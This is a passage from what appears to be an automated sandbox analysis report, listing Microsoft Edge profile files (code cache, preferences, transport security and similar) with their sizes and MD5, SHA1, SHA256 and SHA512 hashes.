C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c287b5daf63a00b8_0

Filesize
1KB

MD5
e5182f9c88e8df6c10b08408c7fb2343

SHA1
8619d455d8ae5dbd544d0baa83665d6c57c526a2

SHA256
2d805ea3274101836acc6c466268ea9609a02412ae644124c2a430c45193e568

SHA512
b12b7b69449b67f610848d6f96b7400d8c8c08e46afdbb1acc7c391f7458ae99ab5a32b6ea679dcf8af9854ffbafd32dfdcf976dd924e2cce335687c91f26862

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c60fe4ef886e6c5f_0

Filesize
51KB

MD5
fae7a7ebdbd85b72c037701e5df229fc

SHA1
60392f33cd533af274a6973afc51362226b542b5

SHA256
190621b020b2263addca7f17203f6aaf78f388a047a981875796f35d2d0949cb

SHA512
11ce3c69ce3e425942858b7070954c86f3615db6c01f863661c06e01209b82f7c074fc3b17f250953575fbe44a5322c81a07d0c530fc2aabd62139b1ab728975

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c64c4901ade6baa3_0

Filesize
2KB

MD5
c0ea1f9845b9f255c9d91970cd8e73de

SHA1
25ef411775a64266e14319313893487b80a17442

SHA256
db2a964285d67909209da28606938c9ecebd6633f88c8097ded7ebf572c280e2

SHA512
40562c381a90856ed9768490e9a00463864a3be9b31526e485aef665701e2df77cac9af5d486c51e26ffc44d911d05911b7333ae7a10da1f372944a36a665c4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c9822c34ba20db86_0

Filesize
1KB

MD5
c704e5c4dbb9e54dcbe3bc2eba7dde39

SHA1
104ad853aa2b470fcbd368c3ddaa80e663a8263c

SHA256
8b6e36da13977c45f817912536934d0e53605d25e30f23c2ae51e9f38fab8e3d

SHA512
351b6de23a1a30c3b5de96d9c9da1c24a652b42d1d95202c10fb648d86a730115bde6aed60da602d6f80861c6a5038890565d35fa98cc3184d98b1ee927fd5aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c9cafdb5a5262126_0

Filesize
12KB

MD5
89ef31ee566849af89c3a0f3854de50c

SHA1
928d410fc8215bc59bee82dc1721a65f6a566cd0

SHA256
276ec27884946be402794bd9c3fd455576e9e2f3060ce55f4766def622827dbc

SHA512
a548d351bbc235717e93f3a0f89e9a4b231597929528ec55eab43ba50cb84eb9cad19e9dc0b8b1b13435cc920c451646f382a85b81a13b7f8c8e93edce85d5f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\cc48d455a0beb0bb_0

Filesize
1KB

MD5
5dcaa7dd308d3e3b3bcce895f4d0f289

SHA1
acef236e1bef81d584857fa909e2be71cc6ec036

SHA256
f9f6e0e84542f777d531d23cfa190aec2066007816a9166b9a67df6928da657e

SHA512
ef9780e8e099b587939be16cdbabc046cdf9f2ea13f8104bbd44f4399a049deacd40d37266f3caf9b6145d9f95271bfff996a3e212b4f2b5e961f50f26252223

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d00659af99907d53_0

Filesize
1KB

MD5
a9775e682a819022d8f4192505688ad5

SHA1
09d46cb9eadf6748dea49d6754b2a0daec822e09

SHA256
bafea463ab94ad860c90c01fac2053fe599218e976073c667efd5fb7c73a8d00

SHA512
bdf50be743ade844ed61d2674c70a5096909d450587fe9b9e50d34952cd38778fff8232f158e338bbda2117d57f21211683ed60b94fdd51264759860b52b515e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d068f665c8d93b52_0

Filesize
2KB

MD5
8374dccc319d7e9337909808cd8d00f6

SHA1
5ec122853e4fca638bb2567dee49de33ccca0a86

SHA256
d7dd5f4acde62a9d73857b473f50e00b358da15d2115a64d0f62156bf473486f

SHA512
ccd9c16a1caeda264787299850d9ebb0ba51df9fb1a442adac5c0ac35670150ff74221ded5693e6f79ce20015f3746938f4ab96ede0b7bc0b8d014e6f29cab0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d0bfe2f0ece62c7d_0

Filesize
4KB

MD5
11f83a9a2e18628f467b078320ff099b

SHA1
3dfda692a89d3c582c972bc0a7d101fdf3a12e73

SHA256
ff0e2170944ddd5a65c6dfbb12d527b2b1998d699daf80707ab7c138f2714dae

SHA512
7385715cd66b668410ce910fc79c16a0d7dde325edb556b5bf03ad8a01bb66c15ed066a19b3192988182a6bff91f19563a84dca653908ceb630584fcba3011a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d2e8414519a5080f_0

Filesize
269B

MD5
4e8c532c6c3259f58b86f2c7fa3e6e51

SHA1
217ec341d688ec58890d6d28e3b726fcdd6dcba9

SHA256
71968f9fa29bb467eb999e768aada87997c37f5b4445d91b9e1012a80beea907

SHA512
d6fd99904156844070b1a406889c2a0a88eb67f7ff8c466739c674f89c4edbf5b938ae095a21ca60b31af4f354f2662a684ceb50c889c47b44b688e22b4e021a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d32d82e1100cbbcb_0

Filesize
40KB

MD5
2506f72760275813da3019c21a58fef4

SHA1
8537109e9509200d99cfcb68b12043439dcf0541

SHA256
de0a01c8997bc31d3c397d6ad8a456d90d709b1bc612f9ba85b323371ea16913

SHA512
ac65c8636a8172f153cf9efc61152528f4798005e850d4932769a578925027ffb18376995d358e385ffe4e03e476780d0ec08d5715277118b16233d6090bd70e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d6f96a3c94a636bc_0

Filesize
1KB

MD5
d1662e9ef97d2ac0de446c3850324896

SHA1
1855aa90fb8a8794ad86f929ec07a8814edee33e

SHA256
1f3a1d212fdbdf1c687a3452974f4252cf23e26db4d5220e86bf722e2b82d64c

SHA512
0318bbfd4d3c6fb1f21d64eb70f296c1c40c92fabea07f3ae0d2f020a9b3f62ba8a144a771a6f2290e59e9e83a0848513c1284626b44132c9cd5d802c60fcca5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\dac519eebb4a7a0f_0

Filesize
1KB

MD5
4c7fd600b93f58491da7d46b3998f027

SHA1
cd012bfdfa93a27af3092ba28cdbd63eeaf1774c

SHA256
5f5ef8d424175e26a319aa0550deaba0bfb02ad43ea69b55049927ca7cd26605

SHA512
64245c73c49cdf24ba3e227fe2757726e9fa523188472c480574f7634f9ef58e6b26de3409655a8f02d8e393fa38a5d401f3e6a5acaca3b78060ad228cb949f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\dd574486ba295a99_0

Filesize
275B

MD5
284c68bb915887b3b112eb117d8a1537

SHA1
8334eaadecb9ea0f3b36c8c9602489016aeeb29f

SHA256
301983ea6ba0eaf8e4bf2db4d57c692f2e7752faf1fe9c57cab9acea2cba88d9

SHA512
b673fab6e029169be66050963e7cfafde9dda301ff285cc7cc710841a4b151e5b2a442b37344b9f11181441cf773d4dd8ecf99b004d4e2384574c8b8f2fde5fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ea6f9b427b7b87c1_0

Filesize
2KB

MD5
0a8e45c87734f4cc4ed0e7a14cd774e9

SHA1
c9e30bab5f12997ed8970e65be9eb2a9f4726ff9

SHA256
726d1a5645a23b8c9e23441829e6c218bb71822e7499595bbdc15b120d933bbf

SHA512
133a97144300df77d52b9e177c70c4eaa0af9ee232122c6944f5fabe23f82ad2507dc97613e6aef624bb87d2f630b4ac5810ec5a967557fab5daaa371ee136db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\eb5a38eb6d74971f_0

Filesize
13KB

MD5
65108c43521dff7e4318f372285f5c6c

SHA1
452b5176897540c83d8024d1f53d3fe0c25e901e

SHA256
ae54164da1fcb31d74ddb43ff9904c4924a835ac536f1e1f79bc16d2efb6cd5e

SHA512
853f82979f508757a856065a2af2e096bbf05460876b0ade5afba53a953c636c9f568fb4404567a04f53348972da97eb770f69813346f314fd57f2908345b175

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ebe10eab84535fd9_0

Filesize
2KB

MD5
bf9aeb20383b8588acd7f8c933eb2ffd

SHA1
d05562f3684b817f0b16922dbad96065e6c145ab

SHA256
b7bcacc5fdab2b2fb656ab1161f0bf00b29673ee68cfcc244289573ed20a9a4f

SHA512
b0a2638a7f69a8881286859531a1ba553ef9f96701816b8501e96f327024a42e6dc2466b498891875418cc9efe3a8b0b9f7935ed42a8937e6e922c0360a046e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f19d329d28a5d80d_0

Filesize
4KB

MD5
20ca1d7718830ac74391a57a6988f9df

SHA1
8caf828c7450484c37858628c4c178deb8dc84de

SHA256
d0a900b713e767b08772f298c08f2d7d67365a008fb38dd3f6f8ca2b8e08e01a

SHA512
7f67ab9772c34b4d8f3ac2e372cb3c798c5c307f55b61ccce205bbba7c5f2b4d678c30f4792469ce10e902d69ddcbe33e8d577822d4e9f8bcf346a5fefb4285c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f535f9453fd2381a_0

Filesize
1KB

MD5
20c490ca4652331c82c6446cd8c2c7b1

SHA1
b8176ab8f20551aa66f182edfe8241470ff7c830

SHA256
6dcdda49fd9590b171846e83851184d03e138afbd6160f22cd0a37814fbe1b45

SHA512
353623674584bf63acbb33f4baac7deefdfb905bf46d4e0ba748641e7effc00cad0dc4944ed77bcfd60d67143553f1b23d07cc1d1e7255e135304dff281c277a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f66233e72c393c10_0

Filesize
1KB

MD5
e1aebc743bf20e54c3fec4659baa4aa1

SHA1
3bec25b782e026dcecb47e298862c7f56f62726c

SHA256
62c51da67ef1d1f422589734b381eee5e331c22a5e3fc9e9a6904d62018ab10c

SHA512
ca90d1527aba407335ef95aac32e39e9688c06f3b25c1cea1e1f83d92add399c63ab3cca27f88d2f9a8a2af68e0c647c821f1b64da9b1f997ee1a8bb3ed7d36d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f68c0c9fba9d8153_0

Filesize
21KB

MD5
b7afbd7230339bb107fee3a12ed6edb5

SHA1
9d2f7db760802cd27ff8f4a83ba78228bddd2430

SHA256
ef38e1cbe74d17dc6e60fc6ed340351c3283c6f277e8d7d38746ba21e1b3df61

SHA512
da33d32e8ff7bc7481fbc7682c1ad5b884dd01c5ca9a628435b5663debfe79b864017eea0994c469803086b49266718af9fc022fa86e7c44e0ade923bb5e7f0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f6cdb8ccdffe5fd6_0

Filesize
5KB

MD5
df2e5f3291169637a155382ee14704e7

SHA1
2c9e1c2cd068f58a77896c5b18a6e17efabbe22d

SHA256
d470bb3cf069f89c49f44fe925fbb452cb35220efa05ee4bc33c383dd03efe4a

SHA512
7eec8dbd3056f5e034aa6e6973afd507c8051bd7bf3e63d9eb09df1422bc68a89c958c53bc64a46c39e58c995631ebe50284bbe50aa3bc29648cda9b84d94f61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fbfb3b8352a67a9e_0

Filesize
36KB

MD5
c71b6ed1bcb8faad434a0f5cc960803d

SHA1
3eaee5a1bfdb53d64b5c1684d7746c26deb77c60

SHA256
7717a8cb6e6524c4bc861e4129c51473ff350b7fa4c2a91455030475cb11dabf

SHA512
7560a46b8ab420828ef7fa2c88ef16f22db704f399a6c4ccc2eea0a38e290a6a0921c43c8bab4cc715dcb193aadba1fc49b5d62d908b175d64fb25f2ac0c35c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ffe62a08b235c1d9_0

Filesize
17KB

MD5
cc375a519c278eb052d0cc44e5b6e6aa

SHA1
208ba75745aa68fca5b280def40caa1fd79f08d0

SHA256
d8ba39dae83e361f55dd52bfa2164bc2712f01f82891b99b1732fae505a263a8

SHA512
561b222ee45c370160fd30ff1add779003f89d6e7e423a0145c0701a64855ce9215d3f28a0b19ebed785230b0c7d47e58afaafc50bbba023891e1b0f6a54425c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
693c82d2b248873eb850bce1eec5d710

SHA1
8b29f9e7e8bd8a38da54a2b9d717c6911dcb251f

SHA256
13bcc503bc50835bd523335497e5f4b0af27c8e7b8b23b1dffe5e6cfea744e78

SHA512
780dc3a6c8d12682130771981652c9a7dee75d40fde783622a09c54f36f82850e279155a0a05193619893190dc8e7da3f560ce4582a6391b24da80b05c9c08bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
47fa416f97777a0877ae9c5f71b32170

SHA1
37f8a6f8cde7a0c7604d125647bed9c08fd0c8a3

SHA256
cb55f01d291306ebccdc3d14d30f14841bef42366257a9a2d904f15ddca9c059

SHA512
ce119066576399b177d4665b28b1c51411dd94b857d82462dff278a1120339db40c49d17c4192fa4e43631aa2fa23f2f061937209b42dc0c1703ba4f3858fcb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
c28b0dd95fee1c30cd9412d6c7b730c4

SHA1
6fb28a4814ce0e90946ad16f6a98ac5ac2d84db7

SHA256
a59545d6cb07029e524464736d0a4cd431b106d91b5a59717260f20fecdd7067

SHA512
27206a07b2b0b2213578e707c2c8bb112b0096ff71c6c8089de05f5e56f0240fab36e71e8f3681d27d0c7a8d386caa627bee447da0cf4dbddafbfa9d8cb6635e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
7ccc3eaf380ee3210c6eb1ec11d4e859

SHA1
2e01deee95c63fbf8080c04deb6f3981d173a817

SHA256
6863e5984787c2e235ad7c7cd80a2fb036169b338b646a8a7b12c8bdb86ce442

SHA512
1ecb7d0bfd95de77a358c885d06489fc6e287cbbeaa58e09dbcf9bc2002aeb9dd273888314c1726199ee8e7f10c8e56c7805b309710aff04257b6a4523432d7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
d40e3949a006bbd4c0c550f5f704fb35

SHA1
444adb8e3941a818e8109ef54937c4c45e85995a

SHA256
31a768a378494131abc68725f95ea86bd99ee68fcd299de658eb1598669c4437

SHA512
f085b0bb1b18825466f6e75af444a52aabdac0feaeefbb8a2442bcea1b2720e083e360e01c9f94f6c8814103a3271ba736c7d7bcbe9540f7f9cd32cb9b440499

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
61B

MD5
4df4574bfbb7e0b0bc56c2c9b12b6c47

SHA1
81efcbd3e3da8221444a21f45305af6fa4b71907

SHA256
e1b77550222c2451772c958e44026abe518a2c8766862f331765788ddd196377

SHA512
78b14f60f2d80400fe50360cf303a961685396b7697775d078825a29b717081442d357c2039ad0984d4b622976b0314ede8f478cde320daec118da546cb0682a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f4ca19ac231e84ecfa5bcb90be3fbdab

SHA1
8a866f0d6f0b2b3e009412dd274f75c74b7b92dc

SHA256
7d405e98a3288cb748da93ec13a26213ce168d285e08a93d1379ccac0b7e6017

SHA512
09d43b9be5f5023d907160e819fe2de0afafbadeae97fe49aa82e3698da0e5f30a89eef8b3e330dae2d224cf95c0a52b045e64221c0658df695592391f216057

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
92eba8b2c4944ffd218960d9d9164fbf

SHA1
41889d8a5ef5979493ef8bf826530b0da95b7b55

SHA256
43e2daee3148de9b2667a1e7f924a9d09e8838b3741d7e0b23107a56e522628f

SHA512
6e21a0dffd561f98e28e15deeb6bcb8425666eb4c7be19be4669ef8a15f034289fb7f174e31fccbdbea3a123f96130d5b6bc8da3690d47b60948ab47d9a4c70e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
69834384f7bc90c6bc2a8c36a7acbbe2

SHA1
82ef8b3afe8831e8c73aa03494b764e63dc6cc83

SHA256
0f513ef20a2d2038272544951b9e1c179c0fc31dcdbed9984adaf281a88f89ae

SHA512
fa0b6b83b3edc2b0b43d7c1ff9b0b99abe585f92a1e7486f05215e64b2ca0f459f4bd93e5660ba2f6ef8700ec1f87bf31c518331720c688ae0388cafb95fb396

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
36bd4d806a6e29aa1cf535742f141ec1

SHA1
d45befe51c7ada536f79b95f9b14c9f6bbbdd233

SHA256
daf5828158968af4d7f11e91d1930380d0e35f0286ecd1665ebb073dc264350c

SHA512
a7aefa89b52744c8e4bb5e7f5c6fddc535654d93831bce0cf26bdcf065fa6f3cd49905ffc612e565abf0ae41b468269f07eb6621079a9a300b35f55b5a306028

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
da61c7ab9028b67ccb2523e03faedae4

SHA1
d0cccd95042962ff8ca3c6572a69ce64c042bd6f

SHA256
6da8c3fbd3d5f1a3aeae0da010db99641d811257885f1e83888aef100be14f56

SHA512
d8d6e61800a1f11371e6c4bf47a98996f93b2ce64617208c10687ce3d82843272542585d46c8450400321b6141f06823588a2d2ca35b346e0933661c3379ab04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
264b0e43f06755d86b9f10741fdffbd3

SHA1
98a5b897b2c3c682350b1bae69dfb3a17b798195

SHA256
ca30d3ae636fed5ad6377f0d895495bc8fc1d2244d3a43320d0dc12af1b99ad7

SHA512
4dcd65d7a908feac4bf03a9ad74e83d61c73a424044c707dabccfd38f93d16f19a120409c54ac0b09556c2b130a3d3afc902a44638a9724ad0e57bb8a609fa6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ec0a7abbf595e82debca783dece91bdf

SHA1
92ec8e0c843fe1b919c76066415422163656c235

SHA256
df1add299ed010ffc090dc0bba41749c95afb36308eb16a03bf68700906a43a1

SHA512
5f4e474045bc40c20b0f4a4777c5e4b812cd400af8b4d21062cd5ccb415d49787ae59187cab3175f3e1e6f08df34dc99fc36fc8b6abb138a0e414e291dfd07ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
afe3dfb8c57a4cdee1cc93f37824695e

SHA1
5b886fba2e31bcc359275fa12dac8557409b0784

SHA256
23c8060fc29693ec37fd343d4f01ed12aeefdbe73fbae916365afd7e6ffe2837

SHA512
c4e3205d72fb6c691b3139a7ef883c0c0451413b4a6154021cc834e0741d7a80290928915f4419dc037259fbc3f7e73b4946c3902dda3f5074808148ad3490ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c0a111952b92e5e64fc6377a3c10f537

SHA1
cd19d137a97f63098fa1e060d553a2be654f5377

SHA256
a3a08c310f848e73da90bb27df2ee26c3fdd94974838511eac6ee79927a006b7

SHA512
0d617784b192b9390c6d18088d9525ac3f777abbcdcbaae27e8490eb8d52f53435c348663457443ed821b5366a01fb8545052d1bc85d792e54a5c86c3d360fad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e269fff2f51bf78184ef5120e43dbaa3

SHA1
d1c57c020dcec46c9b0b85ca0e1f4205f3ae4e3c

SHA256
a4d59d8644a222edb5b3cdf9130d9f70caaba05a3ac55b169203ddb6a65cbd90

SHA512
56106b0b7a5c8fbce113b5903aed5f53a707c7d1dd8ccde177f6bcc094a4ea42d7b1d60b16d60c15108878225c2c2902a2dacc527d75b9eadbd3ada6ff226e98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
256e8a606ea392a7bb4e1ae489d99f1a

SHA1
a809129871f5bad2e224d4aaadb8459f144ca8a9

SHA256
ec0acfa3d87c01a0b170b0e1ac7ca09f865a415d38cbb7057330aa41c81822f1

SHA512
78f0d36102f3fbbb7f8eb6366755905c2e7651744571b7472f33ea013d3e8b4393c1d2ea260d11c7ea3ef481606c00f663bd6270afe328cc046d323fb165045f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
874B

MD5
0f3e0c4d863226cc5536042d996d8bf4

SHA1
a4fcd10e793bc36ddc553be24e2a0260935a856f

SHA256
dd63f6dd0b9a5a734aadf3dc5a99ee147ed4e593c6fa6a8fe30e5aadc0adc67e

SHA512
10247308a683c4ae993ec28a720310495c4ae050ab9e73084e575e7ef060370d9d39a407c0bef1cb7ab04c38cd4cab3f9b82fd13c14879e9481407dd02786711

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
874B

MD5
8840b7d6c054196e0fa89113c99a0966

SHA1
2b775c85cb0e2a44dd4552b56d118dba9ef27f16

SHA256
24db7d3ca8c812e6ea42615e79d1c6ccfe544fa704882a215cb5c4bd4cb589a0

SHA512
aa3826c27e6b6d0c56cf8cb9b53a3a800db171361f0fd461c02790d3e848e3217e17dd6e92199902ed2aa23600303e269ddcf09144bc0a296f0d77c4c470c6d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
0df4f8e98bb44341e5c53ec10c60fcf2

SHA1
15476814ae6813443bae55284635537740b3cdaa

SHA256
5eca0229e3a786eb208daf0742f639276abf52e2fc0007ebe217c0f415085384

SHA512
e6f14418b93a5b70ec66c07e39a0a8cf5cfe98d1affc414fbad2c6d83fc2e625358c866dfd55b210135a4314d6aabb48c5dd7c84fe23d5f668c013842eb94435

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
63156622c18d15c955cd863df6a54538

SHA1
8b0c0d0bfa09602abb621a7e2b9fb04ff6fb8784

SHA256
dd86e6abd7270861213c768b1c90a1630d9e430608ab77e86533ac8688d80790

SHA512
dd1d7a18b0ffd2d243a234649f262bd5080a0a25afe843db7c973c5107b4366b0e28d2741453aef9b3c8a5fdb8a8e3f86eb2a24848fcc25930200b691997a279

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
580e34c87db30371c817005998cc402d

SHA1
397ed12268b71c3060ffa758e6ba519b8953e043

SHA256
373e52d8e38e15981bfba12d3e8d1d8d7510bdcac84c88dd49b6d702203652ec

SHA512
769935ae5ccdcb0dad1fa9fbd54be0718be952411b130c4b407e0e24b57ac5b5df3e82a7721c0b1331a93c713fb7ecde27c72432b0e784fa92849da9de8ace4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
096f9afc500e97338584b7f155829c2b

SHA1
a03a0e29210b0e91db99421b4154f86136cc4a84

SHA256
caac95d7da18e06ab13e6108e2ff1fa48055869cbb1d872aa9fffaeb12282a74

SHA512
96ef51e06497370f20ea912eba706dfebb594312018eb2ed9a42a90c00c100776c1f28807f407e9b811c53d096dea8960a93787776db5ce24daef0dd1da8414e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
32b19f20b85626eb019855bc78aa3c98

SHA1
74a7d97ac89146b2011f44e2aacff209818266eb

SHA256
7a65ac0e4fb6d855a6763a9af60614ff1ff2094440044bd707eca884a2c646a0

SHA512
32840bd8d7c73b5c39bb39d99fa0d8d898cf0121a692b4995dd9e4153c6a2f495ef30edd9c09829c78d87ca81ca03f394afc1bab69623650a5e14760e2012aa9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
2d4c728f25639ce35c2368fecae49cd6

SHA1
c7c1896a1c2cc73fd3a7335b7802518f187e84a7

SHA256
396b6b387772b8ca0f379d19268d8682b7bcc13c99508143b0aac9e1b8a38087

SHA512
ba0a96ea0087d5e600cd8d4dac70595f5aae7a5a64e6cfec99b727beaa86c929eace5394f397e986381b41694c499ecce7167de118acd1d69f83c687fcded859

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
21bd3308b112311850611b3e44b542f3

SHA1
675ea7b2b7220e3ceab844a2b0552f8fae87ca3d

SHA256
3f5ade5f6047bd485c8c36ae86e8beba6e1058428b0bc12c5099015da66f486d

SHA512
f32cf101eae087d270368ec6845746e7a898bd38f0afa5f774c9fa349a1587a98b2fdd6f2ac6ac0413de5864bce5c5d16518642d9d359a0ca5cea5eb510e7613

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
c529ee2fb7e0b2d5c5f9e29c816d2e5b

SHA1
354c80bcdf235c3e90d35ab0021fa8cfd0ea7f07

SHA256
d89db2b9b20fc124efe1c50878acd328834e2d9dacd5585afd50afe8a0c2a6c1

SHA512
ad7ff814393983e952d1b26d7f1be833772011e07372018995cdf822cf7eae93a8f04b9d2f2753245bc2d0e918ae99d210232d2bb2c382c09a2a89fccc24a135

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
4792c0b658edcb4262f7fe1f860cb5a8

SHA1
ee8deab95b6fcafdb4a5cc78a9066e8fa61081b0

SHA256
9486717399ccac298bf6bdcc88f6645b0b2b682ceb6d360c25589ac32c65482a

SHA512
13296c69c933720fcc58bbf03ec1dafc8247f7ea9f27d20d8a9f94255bdb5d88bd81c3aa66aa21bc52bd14dd538f00e23541d1e260480dce2d735f7dfd238f1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
3a29984bb01ba97689b9c23f2b13e8e6

SHA1
5f5f3dc6437853f7cd343ad91e2e500c867f741e

SHA256
cb7adbc4847ed9aa18e01b462135d5aac18b885626dfc019e92d781f7d2106e0

SHA512
bebb0344ec25c5df9706edcfcdd8f95f73a423c74b243b50abedfa2db16606a7c81481811aa291da2e615db28e42679f1451ea87059451be8a26942f7bf5aeda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
df7bd02335bd4a0d8de02c52218a2864

SHA1
8ecec67dfc295b98bd0e13ecacab79ae01c0e997

SHA256
6e93bad5df8fc18abc76ec7a96529cdac614b328f8b2df1e3c43cb9827208ae6

SHA512
ac65b9f5a88d9ce778036db0a77664b9d9f922499ed1b09143698fdf03850e249415d681b4a8c8e873c62fcc027e97231de9d38269a776a0ab53c2f9bdc40e4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
d8a2f691b3b0c3b7f82fc92cc6b01df2

SHA1
5b5c0418ac1ded31fc61b7125cbfb608599a7160

SHA256
ddf8297966a20bb7a8791688d909171182a7f5de6a2bee1718debfc37f07acec

SHA512
ef999771186577da5832e23fe7a229d8e8866469b08e9cd03e0d83d4eff7ad199d4169d3315dfc12db665991761b7dc2fc87a580e8e5396675d2565a311ecb9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
42ba06b07f577db85764eaae2ba0ce9e

SHA1
20d542f45762ca6852467abbc23ba11589b5007a

SHA256
f303eb8ffa60be3574f96801062248d8d6f2a8bb2766b4e49f81545e4d16c4e2

SHA512
006a6a64354b10fd188c0d10d4e2ebbe8eb5fc8405967f4361998f9643a392b38d922fcc795d44ae53f3075e415cb22b4cfa7e2f371cf91380cd6f1cb2360614

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57c0c0.TMP

Filesize
874B

MD5
72295b5728321ef0682202d160084ed2

SHA1
715f070b7ae7adac95526b6a1094426c108d863a

SHA256
5490a1c34cbcdb3b15f62f2429502a013bc7c3baddbff5315961fc06303981d8

SHA512
52e2285412f4a7980e0dbcc9b15df3cbb4c729bad5d365a74516edb6aba2f89828225db45648b4d3f9d2ec0f78cdfc1f0c9c62869365886d3309749d4801596b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
